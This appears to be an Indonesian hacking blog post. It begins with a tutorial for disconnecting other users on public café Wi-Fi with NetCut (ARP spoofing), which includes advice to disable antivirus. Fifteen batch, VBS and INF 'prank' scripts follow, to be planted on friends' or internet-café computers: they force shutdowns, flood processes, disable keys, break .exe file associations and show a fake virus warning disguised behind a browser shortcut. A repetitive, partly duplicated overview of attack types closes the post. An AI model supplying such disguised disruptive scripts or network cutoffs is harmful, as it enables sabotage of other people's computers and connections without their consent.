| Month: | Sign: |
Sunday, September 16, 2012
Wednesday, September 12, 2012
Berikut ini adalah tutorial dan panduan sederhana Cara Hacking Wifi Menggunakan NetCut Dan Cara Mengatasinya. Di kutip dari forum terbesar di indonesia kaskus.us. Pernakah sobat lughot mengalami kesal pada waktu enak-enaknya browsing buka situs jejaring sosial pada sebuah cafe dengan layanan free wifi dan tiba-tiba koneksi anda terputus padahal udah dibela-belain datang jauh-jauh. jika pernah saya ucapkan “Selamat anda terkena Sedikit gangguan Orang Jail disekitar anda“.
Ikuti Langkah² DIbawah Ini :
- Download Software Hacking Wifi Menggunakan Netcut Disini Download NetCut 2.08 Pass RAR: aghilmyblog.blogspot.com
- Install Aplikasinya klo ada Antivirus yang menghalangi instalasi DImatikan aja dulu Antivirusnya
- Setelah beres Instalasinya jalankan Aplikasinya pada desktop netcut
- Nah disini terlihat ada ikon monitor yang menunjukkan para Laptop yang lagi terhubung internet dalam 1 jaringan cafe, penjelasan simpel nya ikon monitor paling atas itu adalah Gateway internet dan di bawahnya adalah komputer kalian, jadi jangan sampai Cutoff sendiri gateway dan komputer sendiri sama aja bunuh diri .
- Setelah itu pilih IP yang mau di putus lalu pilih cutoff. dan usaha anda berhasil membalas kelakuan para orang usil
Tapi sebelum Melanjutkan Cara Mengatasi Software Netcut saya ingin berbicara dikit tentang Cara kerja Software NetcutNetcut adalah software yang hanya berkerja berdasarkan ARP Spoofing , ARP itu Adalah Address Resolution Protocol Masih belum Ngerti apa itu ARP.. okey begini saya beri contoh:
Komputer A(komputer dengan IP10.10.1.100) dan Komputer B(Komp Server Mempunyai IP10.10.1.1)
Dalam keadaan ini Komp A Ingin melakukan Koneksi Ke Komp B
Dalam Kondisi Seperti ini Otomatis Komputer A melakukan broadcast (Seperti halnya manusia berteriak-teriak)
“Halooo Siapa yang Mempunyai IP 10.10.1.1″
lalu komputer B mendengar dan menjawab Bersetakan MAC ADRESS “disini IP 10.10.1.1 itu 00:0C:A2: D1:1B:3D” Dan Kemudian Komputer B Melakukan Broadcast atau teriakan balik “Halo Tadi IP 10.10.1.100 Manggil saya mana yah?”
Lalu Komputer A menjawab “woiii saya disini IP 10.10.1.100 itu 00:B0:AD: D5:1C-5D” Kejadian Inilah Menjadikan Proses Transaksi Data Antar Komputer.
Setelah sudah paham dengan cerita di atas kita lanjutkan ke cerita berikut ini Yang Berhubungan dengan ARP Spoofing :
Komputer A(komputer dengan ip10.10.1.100) dan Komputer B(Komp Server Mempunyai IP10.10.1.1) dan orang melakukan ARP Spoofing “C” dengan IP 10.10.1.99
Dalam Gambaran Ini DI ceritakan bahwa Komputer A ingin Melakukan Koneksi Ke Komputer B,
Komputer A Melakukan Broadcast “Halooo Siapa yang Mempunyai IP 10.10.1.1“
Bukanya Komputer B yang jawab Tapi Yang Jawab Yaitu Komputer ARP SPOOFING “C” “WOIii saya disini IP 10.10.1.1 00:1E:05:AE:96:F0?”(Komputer C berPura² Menjadi Komputer B”
Lalu KOMPUTER “C” broadcast ““Halooo Siapa yang Mempunyai IP 10.10.1.1“(Komputer C Berpura² Menjadi Komputer A) dan dijawab sama B “WOiii saya disini IP 10.10.1.1 00:1E:05:AE:96:F0?”
Dan Komputer B Melakukan Broadcast(”Halooo Siapa yang Mempunyai ip10.10.1.100“)
Lalu di jawab Oleh Komputer C (”WOiii saya disini IP 10.10.1.99 ada di 00:22:FA:AE:96:F0 ( yg disebutin adalah Mac Adress Kepunyaan C / berpura2 menjadi A)”
C teriak berpura² menjadi B
“Woi Siapa ip10.10.1.100 yg tadi manggil gw ? “
“ip10.10.1.100 ada di 00:1E:C107B0-Z0 ( Mac Adress Kepunyaan A )”
Sudah mengerti dengan penjelasan gambaran diatas. dan dapat di simpulkan Bahwa :
ARP Spoofing itu Ingin Mengasosiasikan Mac Adress C Dengan IP adress Komputer lain)
Kiriman paket data yang dikirimkan ke A Akan mengalami kesalahn Pengiriman Ke Komputer C
Dan “C” dapat dengan leluasa untuk Melakukan Cutoff data tersebut ke komputer G atau memodifikasi isi dari data paket sebelum dikirim.kan
Sehingga Untuk Mengatasi Hacker Yang menggunakan Netcut di publik Wifi adalah Dengan Cara :
from :
- Check ARP (Address Resolution Protocol)
- buka cmd (command prompt) pada startmenu > run
- ketik arp -a, untuk meilhat ip router. dan akan terlihat 1 ip router, jika terlihat lebih dari satu ubah niat anda untuk Surfing karena protokol tidak encrypt seperti FTP dan HTTP login
- untuk menghindari Hacker Usil.untuk mengidentifikasi arp ip yang muncul ketikan perintah, tracert domain.com
- Ubah alamat ip Addres.karena netcut melisting ip addres di dalam jaringan, maka kamu harus mengganti alamat ip. saran saya ubah kedekat dengan ip server atau gateway untuk mengelabui si attacker netcut.
- Matikan layanan workstation.Run, kemudian ketik services.msccari layanan workstationjika sudah ketemu, klik kanan, properties, klik tombol stop
- Ganti hostname atau nama komputer anda.hostname yang tervisible sangat rentan sekali untuk diserang, oleh karena itu disarankan untuk mengganti dengan hostname yang dekat dengan kepentingan jaringan.
- Bisa menggunakan software bantu/Penangkal.cari software anti NetCut atau Anti Arp, sebelum berselancar untuk pertama kali menghidupkan wifi anda pastikan Anti NetCut atau AntiARP anda telah aktif.
- Serang balik si attacker.karena si pengguna netcut ini sebagai gateway, banjiri komputer dia dengan ping secara terus menerus dengan mengetikan “ping google.com -t” pada cmd (command prompt) run. cara ini akan membuat komputer pengguna netcut hang.
- Gerak-gerik pengguna NetCut.Kalau tiba2 koneksi putus secara aneh atau serentak seluruh user tanpa ada warning dari pihak Admin CAFENET coba kamu perhatikan salah satu user yg terlihat santai dan masih tetap online dengan lancar, kemungkinan itu pengguna netcut
kumpulan Cara Hacker Komputer
kumpulan Cara Hacker Komputer, berikut ini merupakan cara hack komputer yang super jail. cara ini sangat cocok buat balas dendam dengan teman Anda, dibutuhkan Aplikasi Notepad untuk membuat Jebakan Atau Virus ringan hingga yang sangat mematikan. baiklah saya akan berbagi pengetahuan tentang Cara Hacker Komputer, berikut langkah-langkahnya :TRIK 1 - Membuat Forced Shoutdown
-------------------------------------------------
@echo off
msg * I don't like you
shutdown -c "Error! You are too ******!" -s
-------------------------------------------------
simpan kode script yang berwarna Merah di Notepad dengan nama : xhack.BAT type file : All file
sebarkan File tersebut di Komputer teman Anda,
maka Komputer korban akan otomatis FORCED SHOUTDOWN
TRIK 2 - Membuat Tombol Caps Lock menyala terus-menerus
------------------------------------------------------------------
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
-------------------------------------------------------
seperti cara yang pertama, hanya berbeda kode script simpan kode yang berwarna biru di Notepad dengan nama : xhack.VBS type File : All File
sebarkan File berikut di Komputer korban maka, Tombol CAPSLOCK akan menyala terus-menerus
(bila dimatikan akan menyala lagi)
TRIK 3 - Membuat Pesan Jail mucul terus
------------------------------------------------------
@ECHO off
:Begin
msg * muka kamu sangat jelek
msg * ngaca dulu gih,
msg * hayo lo,cpu lu gw acak acak
msg * udah install ulang aja
msg * biar masalah nya kelar
GOTO BEGIN
------------------------------------------------------
simpan kode script yang berwarna hijau dengan nama xhack.BAT type file : All File
Cara ini sangat simple Jail, walaupun di close tab pesan ini masih muncul, kata katanya bisa diubah sesuai selera.
TRIK 4 - Jail dengan Membuka Tutup CD/DVD room
------------------------------------------------------
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop-------------------------------------------------------
simpan di Notepad kode berikut dengan nama : xhack.vbs type file : All File
maka DVD/CD roomnya akan membuka dan menutup otomatis,
TRIK 5 - Membuat script mucul terus menerus
-------------------------------------------------------
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
-------------------------------------------------------
simpan kode berikut di Notepad dengan nama : xhack.vbs type file : All File
membuat script bermunculan terus menerus
TRIK 6 - Membuat Tombol Backspace menjadi eror - menekan terus menerus
--------------------------------------------------------
MsgBox "kembali ke menu sebelumnya"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
----------------------------------------------------------
simpan kode script berikut di Notepad dengan nama : xhack.vbs type file : All File
maka Tombol Backspace akan eror dan menekan dengan sendirinya
TRIK 7 - Cara Membuat Pesan ' Komputer Anda Jelek Banget ' di Notepad/ Wordpad
-----------------------------------------------------------
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "Komputer Anda Jelek Banget"
loop
-----------------------------------------------------------
ganti kata Komputer Anda Jelek Banget dengan selera Anda, simpan di Notepad dengan nama : xhack.vbs
TRIK 8 - Cara Membuat Notepad Terbuka Otomatis - terus menerus
------------------------------------------------------------
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
------------------------------------------------------------
simpan di Notepad dengan nama : xhack.BAT
maka Notepad akan terbuka terus menerus
TRIK 9 - Membuat Notepad dengan Pesan Jail
-------------------------------------------------------------
WScript.Sleep 1800
WScript.Sleep 100
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 10
WshShell.AppActivate "Notepad"
WScript.Sleep 50
WshShell.SendKeys "ka"
WScript.Sleep 50
WshShell.SendKeys "mu "
WScript.Sleep 50
WshShell.SendKeys "je"
WScript.Sleep 50
WshShell.SendKeys "le"
WScript.Sleep 50
WshShell.SendKeys "k "
WScript.Sleep 50
WshShell.SendKeys " se"
WScript.Sleep 50
WshShell.SendKeys "ka"
WScript.Sleep 50
WshShell.SendKeys "li"
WScript.Sleep 50
WshShell.SendKeys " y"
WScript.Sleep 50
WshShell.SendKeys "a"
WScript.Sleep 50
WshShell.SendKeys " h"
WScript.Sleep 50
WshShell.SendKeys "!"
WScript.Sleep 50
WshShell.SendKeys "!! "
-----------------------------------------------------------
simpan di Notepad dengan nama : xhack.vbs
ganti kode yang berwarna merah sesuai dengan selera anda.
TRIK 10 - Cara Membuat Memilih jawaban seperti Quiz di Notepad
-----------------------------------------------------------
@echo off
title quiz hari ini :)
:menu
cls
echo jika kamu kena virus apa
yang kamu lakukan
pause
echo pilih yang mana:
echo 1. matiin computer
echo 2. format aja
echo 3. bingung ahh
set input=nothing
set /p input=Choice:
if %input%==1 shutdown -s -t
30
if %input%==2 del c:xxx
if %input%==3 @ECHO off
msg * muka lo rusak
msg * ngaca dulu gih
msg * hayo lo,cpu lu gw acak2
msg * ud install ulang aja
msg * biar masalah nya kelar
@ECHO off
:top
START %SystemRoot%
system32notepad.exe
GOTO top -----------------------------------------------------------
simpan kode script berikut di Notepad dengan nama : xhack.BAT
TRIK 11 - Membuat Komputer Hang dengan Kode script Notepad
-------------------------------------------------------------
start
start
start
start
start
start
start
start
start
start
start
start
-----------------------------------------------------------
simpan di Notepad dengan nama : xhack.BAT
terus buat shortcut palsu terserah mau shortcut apa, aku saranin shortcutnya browser mozilla terus taro aja di desktop target
( efeknya akan membuka CDM yang banyak banget sampe layarnya keluar keluar )
TRIK 12 - Cara Mematikan Tombol Keyboard
-------------------------------------------------------------
1. Salin baris-baris kode (script) berikut , paste pada Notepad dan simpan dengan nama JAIL.INF
Langsung kita mulai saja :
[Version]
Signature=”$Windows NT$”
[DefaultInstall]
AddReg =AIUEO
[AIUEO]
HKLM,”SYSTEM\CurrentControlSet\Control\Keyboard Layout”,”Scancode Map”,0×1,00,00,00,00,00,00,00,00,06,00,00,00,00,00,1e,00,00,00,12,00,00,00,
17,00,00,00,18,00,00,00,16,00,00,00,00,00
—————————————
2. Untuk menjalankannya, klik kanan nama file JAIL.INF dan pilih menu> Install
3. Log Off komputernya agar trik ini berfungsi.
NB :
Script diatas dimaksudkan untuk mematikan tombol A I U E O pada keyboard.
Untuk menormalkannya, silahkan salin script berikut :
—————————————
[Version]
Signature=”$Windows NT$”
[DefaultInstall]
DelReg =normal
[normal]
HKLM,”SYSTEM\CurrentControlSet\Control\Keyboard Layout”,”Scancode Map”
—————————————
—> Simpan dengan nama “NORMAL.INF”
Klik kanan file ini, pilih >Install
Log Off komputernya.
sumber artikel hack : kidzoom
TRIK 13 - Software Buat Jahil - Nakal
--------------------------------------------------------
Software 1
Kalau yang ini nemu di Kaskus. Tapi dijamin seru banget.. Dan inilah fungsinya :
-freeze
-snow
-earthquake
-random colours
-mouse and lines
-puzzle
Lihat efeknya dibawah
Puzzle
Mouse And Lines
Masih banyak lagi deh.. Tapi jangan salah cara menghentikannya pun sulit loh.. Buka task manager gag bisa. Klik tombol start gag bisa.. So bagaimana, Cukup Tekan ESC doang kok.. hhee Silahkan dicoba
Download : klik disini
Software 2
Nah kalau yang ini namanya Key joke! Fungsinya bikin lampu disco nih.. Sama seperti script yang saya berikan dulu. Tampilannya seperti yang disamping tuh.. Ini sih masih biasa gag kaya yang diatas tadi..
Ow iya tapi sebelumnya jangan kaget ye kalau ada pesan banyak seperti iniKarena ini juga ulahnya ni software. Bisa di close kok..
Download : Klik disini
Software 3
Wah kali ini parah banget nih. Bisa bikin stress juga. Sampai sekarang saya pun belum tau cara ngatasinnya. Nama softwarenya Stoerung, sepertinya bahasa jerman, pas install pun berbahasa jerman. Software ini meng-invert warna desktop kita berkali-kali secara berkala. Namun efeknya, menurut saya bisa merusak VGA card, dan ini juga bisa bikin komputer lemot.. Ini pun sama dengan software seblumnya. Dy mengeluarkan alert seperti software 2 namun lebih banyak
Download : klik disini
Masih ada 46 software lagi yang bisa kalian download untuk ngerjain temen lw.. dan efeknya mantep2 juga loh! Lihat disini
http://www.rjlpranks.com/pranks/
sumber artikel : kidzoom
TRIK 14 - Cara Merusak Komputer teman / Warnet
---------------------------------------------------------------
buka cmd(comand prompt), kalo belum tahu nyari dimana , klik start-run-ketik CMD-Lalu ketikan script ini
ASSOC.exe=.hank
lalu enter!
!!!!
program kayak ms.word/game ngambek jalan ! , n jika sudah puas banget jailnya dan mau ngembaliin-nya , tinggal buka CMD lagi. lalu ketik
ASSOC.exe=EXEFILE
---------------------------------------------------------------
TRIK 15 - Cara Paling Jahil Jahat
----------------------------------------------------------------
1. BUka program notepad atau biar cepet menu RUN ketik notepad lalu enter
2. Copy kode ini dan pastekan di notepad kamu
@echo off
msg * WARNING VIRUS DETECTED!!!!! AFTER 5 MINUTES YOUR FACEBOOK ACCOUNT WILL BE DELETED !!!!TO REMOVE THE VIRUS CLICK OK OR CLOSE THIS BOX!
PAUSE
shutdown -r -t 300 -c ” SORRY!!! YOUR FACEBOOK ACCOUNT ARE NOW BEING DELETED !!! PLEASE WAIT ………..”
3. Habis itu simpen file notepad ini dengan format *.bat = terserah mau diberi
nama apa, misal : pacebuk.bat dan SAVE di Dekstop (Recommended)
4. Sekarang klik kanan desktopmu dan pilih New => Shortcut
5. Setelah ini akan muncul sebuah tampilan dan klik browse lalu cari lokasi file
.bat yang kamu simpen tadi, misal tadi kamu save pada dekstop
6. Klik Next dan Rename dengan Mozilla Firefox (Untuk nama ini terserah kamu
dan bebas bisa ganti dengan Opera Mini atau Google Chrome, ini hanya
sebagai tipuan aja)
7.Bila semua langkah sudah oke, sekarang yang perlu kamu lakuin adalah
mengubah icon .bat tadi dalam bentuk Mozilla Firefox (karena kita sering pakai
Mozilla jadi pembahasannya pakai browser ini) .. Terus caranya gimana ?
Gampang.. tinggal kamu klik kanan file .bat tadi dan pilih change icon
Gak nemu icon mozilla ? Coba deh low cari di Program Files => Mozilla Firefox
Nah sekarang virus facebookmu telah jadi dengan sempurna, kalau kamu ingin
iseng nyoba tinggal di klik aja deh dan lihat perubahan yang akan terjadi ..
Harusnya pasti sedikit kaget dan coba low bayangin kalau trik ini kamu
praktekan di kompi temen kamu atau mungkin kompi kampus atau warnet..
what will happen ? abis pastinya ..
CARA KERJA HECKER MENEMBUS WEB
Melihat Cara Kerja yang Dipakai Seorang Hacker Untuk Menembus Web-Cara cara seoarang hacker menembus ataupun menyusup dan juga merusak suatu website adalah sebagai berikut.Teknik teknik itu antara lain:
wordpress website hacked by hackers 01 Inilah Cara Yang Dipakai Hacker Untuk Membobol Website
1. IP Spoofing
2. FTP Attack
3. Unix Finger Exploits
4. Flooding & Broadcasting
5. Fragmented Packet Attacks
6. E-mail Exploits
7. DNS and BIND Vulnerabilities
8. Password Attacks
9.Proxy Server Attacks
10. Remote Command Processing Attacks
11. Remote File System Attack
12. Selective Program Insertions
13. Port Scanning
14.TCP/IP Sequence Stealing, Passive Port Listening and Packet
15. HTTPD Attacks
1. IP Spoofing
IP Spoofing juga dikenal sebagai Source Address Spoofing, yaitu pemalsuan alamat IP attacker sehingga sasaran menganggap alamat IP attacker adalah alamat IP dari host di dalam network bukan dari luar network. Misalkan attacker mempunyai IP address type A 66.25.xx.xx ketika attacker melakukan serangan jenis ini maka Network yang diserang akan menganggap IP attacker adalah bagian dari Networknya misal 192.xx.xx.xx yaitu IP type C.
IP Spoofing terjadi ketika seorang attacker "mengakali" packet routing untuk mengubah arah dari data atau transmisi ke tujuan yang berbeda. Packet untuk routing biasanya di transmisikan secara transparan dan jelas sehingga membuat attacker dengan mudah untuk memodifikasi asal data ataupun tujuan dari data. Teknik ini bukan hanya dipakai oleh attacker tetapi juga dipakai oleh para security profesional untuk men tracing identitas dari para attacker
2. FTP Attack
Salah satu serangan yang dilakukan terhadap File Transfer Protocol adalah serangan buffer overflow yang diakibatkan oleh malformed command. tujuan menyerang FTP server ini rata-rata adalah untuk mendapatkan command shell ataupun untuk melakukan Denial Of Service. Serangan Denial Of Service akhirnya dapat menyebabkan seorang user atau attacker untuk mengambil resource didalam network tanpa adanya autorisasi, sedangkan command shell dapat membuat seorang attacker mendapatkan akses ke sistem server dan file-file data yang akhirnya seorang attacker bisa membuat anonymous root-acces yang mempunyai hak penuh terhadap system bahkan network yang diserang
3. Unix Finger Exploits
Pada masa awal internet, Unix OS finger utility digunakan secara efisien untuk men sharing informasi diantara pengguna. Karena permintaan informasi terhadap informasi finger ini tidak menyalahkan peraturan, kebanyakan system Administrator meninggalkan utility ini (finger) dengan keamanan yang sangat minim, bahkan tanpa kemanan sama sekali. Bagi seorang attacker utility ini sangat berharga untuk melakukan informasi tentang footprinting, termasuk nama login dan informasi contact.
Utility ini juga menyediakan keterangan yang sangat baik tentang aktivitas user didalam sistem, berapa lama user berada dalam sistem dan seberapa jauh user merawat sistem. Informasi yang dihasilkan dari finger ini dapat meminimalisasi usaha kracker dalam menembus sebuah sistem. Keterangan pribadi tentang user yang dimunculkan oleh finger daemon ini sudah cukup bagi seorang atacker untuk melakukan social engineering dengan menggunakan social skillnya untuk memanfaatkan user agar "memberitahu" password dan kode akses terhadap system.
4. Flooding & Broadcasting
Seorang attacker bisa mengurangi kecepatan network dan host-host yang berada di dalamnya secara significant dengan cara terus melakukan request/ permintaan terhadap suatu informasi dari sever yang bisa menangani serangan classic Denial Of Service (DoS), mengirim request ke satu port secara berlebihan dinamakan flooding, kadang hal ini juga disebut spraying. Tujuan dari kedua serangan ini adalah sama yaitu membuat network resource yang Menyediakan informasi menjadi lemah dan akhirnya menyerah.
Serangan dengan cara Flooding bergantung kepada dua faktor yaitu: ukuran dan/atau volume (size and/or volume). Seorang attacker dapat menyebabkan Denial Of Service dengan cara melempar file berkapasitas besar atau volume yang besar dari paket yang kecil kepada sebuah system. Dalam keadaan seperti itu network server akan menghadapi kemacetan: terlalu banyak informasi yang diminta dan tidak cukup power untuk mendorong data agar berjalan. Pada dasarnya paket yang besar membutuhkan kapasitas proses yang besar pula, tetapi secara tidak normal paket yang kecil dan sama dalam volume yang besar akan menghabiskan resource secara percuma, dan mengakibatkan kemacetan
5. Fragmented Packet Attacks
Data-data internet yang di transmisikan melalui TCP/IP bisa dibagi lagi ke dalam paket-paket yang hanya mengandung paket pertama yang isinya berupa informasi bagian utama (header/ kepala) dari TCP. Beberapa firewall akan mengizinkan untuk memproses bagian dari paket-paket yang tidak mengandung informasi alamat asal pada paket pertamanya, hal ini akan mengakibatkan beberapa type system menjadi crash. Contohnya, server NT akan menjadi crash jika paket-paket yang dipecah (fragmented packet) cukup untuk menulis ulang informasi paket pertama dari suatu protokol
6. E-mail Exploits
Peng-exploitasian e-mail terjadi dalam lima bentuk yaitu: mail floods, manipulasi perintah (command manipulation), serangan tingkat transportasi(transport level attack), memasukkan berbagai macam kode (malicious code inserting) dan social engineering(memanfaatkan sosialisasi secara fisik). Penyerangan email bisa membuat system menjadi crash, membuka dan menulis ulang bahkan mengeksekusi file-file aplikasi atau juga membuat akses ke fungsi fungsi perintah (command function)
7. DNS and BIND Vulnerabilities
Berita baru-baru ini tentang kerawanan (vulnerabilities) tentang aplikasi Barkeley Internet Name Domain (BIND) dalam berbagai versi mengilustrasikan kerapuhan dari Domain Name System (DNS), yaitu krisis yang diarahkan pada operasi dasar dari Internet (basic internet operation)
8. Password Attacks
Password merupakan sesuatu yang umum jika kita bicara tentang kemanan. Kadang seorang user tidak perduli dengan nomor pin yang mereka miliki, seperti bertransaksi online di warnet, bahkan bertransaksi online dirumah pun sangat berbahaya jika tidak dilengkapi dengan software security seperti SSL dan PGP. Password adalah salah satu prosedur kemanan yang sangat sulit untuk diserang, seorang attacker mungkin saja mempunyai banyak tools (secara teknik maupun dalam kehidupan sosial) hanya untuk membuka sesuatu yang dilindungi oleh password.
Ketika seorang attacker berhasil mendapatkan password yang dimiliki oleh seorang user, maka ia akan mempunyai kekuasaan yang sama dengan user tersebut. Melatih karyawan/ user agar tetap waspada dalam menjaga passwordnya dari social engineering setidaknya dapat meminimalisir risiko, selain berjaga-jaga dari praktek social enginering organisasi pun harus mewaspadai hal ini dengan cara teknikal. Kebanyakan serangan yang dilakukan terhadap password adalah menebak (guessing), brute force, cracking dan sniffing
9.Proxy Server Attacks
Salah satu fungsi Proxy server adalah untuk mempercepat waktu response dengan cara menyatukan proses dari beberapa host dalam suatu trusted network
10. Remote Command Processing Attacks
Trusted Relationship antara dua atau lebih host Menyediakan fasilitas pertukaran informasi dan resource sharing. Sama halnya dengan proxy server, trusted relationship memberikan kepada semua anggota network kekuasaan akses yang sama di satu dan lain system (dalam network).
Attacker akan menyerang server yang merupakan anggota dari trusted system. Sama seperti kerawanan pada proxy server, ketika akses diterima, seorang attacker akan mempunyai kemampuan mengeksekusi perintah dan mengkases data yang tersedia bagi user lainnya
11. Remote File System Attack
Protokol-protokol untuk tranportasi data (tulang punggung dari internet) adalah tingkat TCP (TCP Level) yang mempunyai kemampuan dengan mekanisme untuk baca/tulis (read/write) Antara network dan host. Attacker bisa dengan mudah mendapatkan jejak informasi dari mekanisme ini untuk mendapatkan akses ke direktori file
12. Selective Program Insertions
Selective Program Insertions adalah serangan yang dilakukan ketika attacker menaruh program-program penghancur, seperti virus, worm dan trojan (mungkin istilah ini sudah anda kenal dengan baik ?) pada system sasaran. Program-program penghancur ini sering juga disebut malware. Program-program ini mempunyai kemampuan untuk merusak system, pemusnahan file, pencurian password sampai dengan membuka backdoor
13. Port Scanning
Melalui port scanning seorang attacker bisa melihat fungsi dan cara bertahan sebuah system dari berbagai macam port. Seorang atacker bisa mendapatkan akses kedalam sistem melalui port yang tidak dilindungi. Sebaia contoh, scaning bisa digunakan untuk menentukan dimana default SNMP string di buka untuk publik, yang artinya informasi bisa di extract untuk digunakan dalam remote command attack
14.TCP/IP Sequence Stealing, Passive Port Listening and Packet
Interception TCP/IP Sequence Stealing, Passive Port Listening dan Packet Interception berjalan untuk mengumpulkan informasi yang sensitif untuk mengkases network. Tidak seperti serangan aktif maupun brute-force, serangan yang menggunakan metoda ini mempunyai lebih banyak kualitas stealth-like
15. HTTPD Attacks
Kerawanan yang terdapat dalam HTTPD ataupun webserver ada lima macam: buffer overflows, httpd bypasses, cross scripting, web code vulnerabilities, dan URL floods.
Cara Hacker Meng Hack Website
Nah berikut ini berbagai cara dan trik seorang hacker meng hack sebuah website :
HTTPD Attacks Hack
Kerawanan yang terdapat dalam HTTPD ataupun webserver ada lima macam: buffer overflows, httpd bypasses, cross scripting, web code vulnerabilities, dan URL floods.
HTTPD Buffer Overflow bisa terjadi karena hacker menambahkan errors pada port yang digunakan untuk web traffic dengan cara memasukan banyak carackter dan string untuk menemukan tempat overflow yang sesuai. Ketika tempat untuk overflow ditemukan, seorang hacker akan memasukkan string yang akan menjadi perintah yang dapat dieksekusi. Bufer-overflow dapat memberikan hacker akses ke command prompt.
TCP/IP Sequence Stealing Hack
Passive Port Listening and Packet
Interception TCP/IP Sequence Stealing, Passive Port Listening dan Packet Interception berjalan untuk mengumpulkan informasi yang sensitif untuk mengkases network. Tidak seperti serangan aktif maupun brute-force, serangan yang menggunakan metoda ini mempunyai lebih banyak kualitas stealth-like.
Port Scanning Hack
Melalui port scanning seorang hacker bisa melihat fungsi dan cara bertahan sebuah system dari berbagai macam port. Seorang atacker bisa mendapatkan akses kedalam sistem melalui port yang tidak dilindungi. Sebaia contoh, scaning bisa digunakan untuk menentukan dimana default SNMP string di buka untuk publik, yang artinya informasi bisa di extract untuk digunakan dalam remote command attack.
Selective Program Insertions Hack
Selective Program Insertions adalah serangan yang dilakukan ketika hacker menaruh program-program penghancur, seperti virus, worm dan trojan (mungkin istilah ini sudah anda kenal dengan baik ?) pada system sasaran. Program-program penghancur ini sering juga disebut malware. Program-program ini mempunyai kemampuan untuk merusak system, pemusnahan file, pencurian password sampai dengan membuka backdoor.
Remote File System Attack Hack
Protocol-protokol untuk tranportasi data –tulang punggung dari internet— adalah tingkat TCP (TCPLevel) yang mempunyai kemampuan dengan mekanisme untuk baca/tulis (read/write) Antara network dan host. hacker bisa dengan mudah mendapatkan jejak informasi dari mekanisme ini untuk mendapatkan akses ke direktori file.
Remote Command Processing Attacks
Hack
Trusted Relationship antara dua atau lebih host menyediakan fasilitas pertukaran informasi dan resource sharing. Sama halnya dengan proxy server, trusted relationship memberikan kepada semua anggota network kekuasaan akses yang sama di satu dan lain system (dalam network).
hacker akan menyerang server yang merupakan anggota dari trusted system. Sama seperti kerawanan pada proxy server, ketika akses diterima, seorang hacker akan mempunyai kemampuan mengeksekusi perintah dan mengkases data yang tersedia bagi user lainnya.
Proxy Server Attacks Hack
Salah satu fungsi Proxy server adalah untuk mempercepat waktu response dengan cara menyatukan proses dari beberapa host dalam suatu trusted network. Dalam kebanyakan kasus, tiap host mempunyai kekuasan untuk membaca dan menulis (read/write) yang berarti apa yang bisa saya lakukan dalam sistem saya akan bisa juga saya lakukan dalam system anda dan sebaliknya.
Password Attacks Hack
Password merupakan sesuatu yang umum jika kita bicara tentang kemanan. Kadang seorang user tidak perduli dengan nomor pin yang mereka miliki, seperti bertransaksi online di warnet, bahkan bertransaksi online dirumah pun sangat berbahaya jika tidak dilengkapi dengan software security seperti SSL dan PGP. Password adalah salah satu prosedur kemanan yang sangat sulit untuk diserang, seorang hacker mungkin saja mempunyai banyak tools (secara teknik maupun dalam kehidupan sosial) hanya untuk membuka sesuatu yang dilindungi oleh password.
Ketika seorang hacker berhasil mendapatkan password yang dimiliki oleh seorang user, maka ia akan mempunyai kekuasaan yang sama dengan user tersebut. Melatih karyawan/user agar tetap waspada dalam menjaga passwordnya dari social engineering setidaknya dapat meminimalisir risiko, selain berjaga-jaga dari praktek social enginering organisasi pun harus mewaspadai hal ini dengan cara teknikal. Kebanyakan serangan yang dilakukan terhadap password adalah menebak (guessing), brute force, kracking dan sniffing.
DNS and BIND Vulnerabilities
Hack
Berita baru-baru ini tentang kerawanan (vulnerabilities) tentang aplikasi Barkeley Internet Name Domain (BIND) dalam berbagai versi mengilustrasikan kerapuhan dari Domain Name System (DNS), yaitu krisis yang diarahkan pada operasi dasar dari Internet (basic internet operation).
E-mail Exploits
Hack
Peng-exploitasian e-mail terjadi dalam lima bentuk yaitu: mail floods, manipulasi perintah (command manipulation), serangan tingkat transportasi(transport level attack), memasukkan berbagai macam kode (malicious code inserting) dan social engineering(memanfaatkan sosialisasi secara fisik). Penyerangan email bisa membuat system menjadi crash, membuka dan menulis ulang bahkan mengeksekusi file-file aplikasi atau juga membuat akses ke fungsi fungsi perintah (command function).
Fragmented Packet Attacks Hack
Data-data internet yang di transmisikan melalui TCP/IP bisa dibagi lagi ke dalam paket-paket yang hanya mengandung paket pertama yang isinya berupa informasi bagian utama( kepala) dari TCP. Beberapa firewall akan mengizinkan untuk memroses bagian dari paket-paket yang tidak mengandung informasi alamat asal pada paket pertamanya, hal ini akan mengakibatkan beberapa type system menjadi crash. Contohnya, server NT akan menjadi crash jika paket-paket yang dipecah(fragmented packet) cukup untuk menulis ulang informasi paket pertama dari suatu protokol
Flooding & Broadcasting Hack
Seorang hacker bisa menguarangi kecepatan network dan host-host yang berada di dalamnya secara significant dengan cara terus melakukan request/permintaan terhadap suatu informasi dari sever yang bisa menangani serangan classic Denial Of Service(Dos), mengirim request ke satu port secara berlebihan dinamakan flooding, kadang hal ini juga disebut spraying. Ketika permintaan flood ini dikirim ke semua station yang berada dalam network serangan ini dinamakn broadcasting. Tujuan dari kedua serangan ini adalah sama yaitu membuat network resource yang menyediakan informasi menjadi lemah dan akhirnya menyerah.
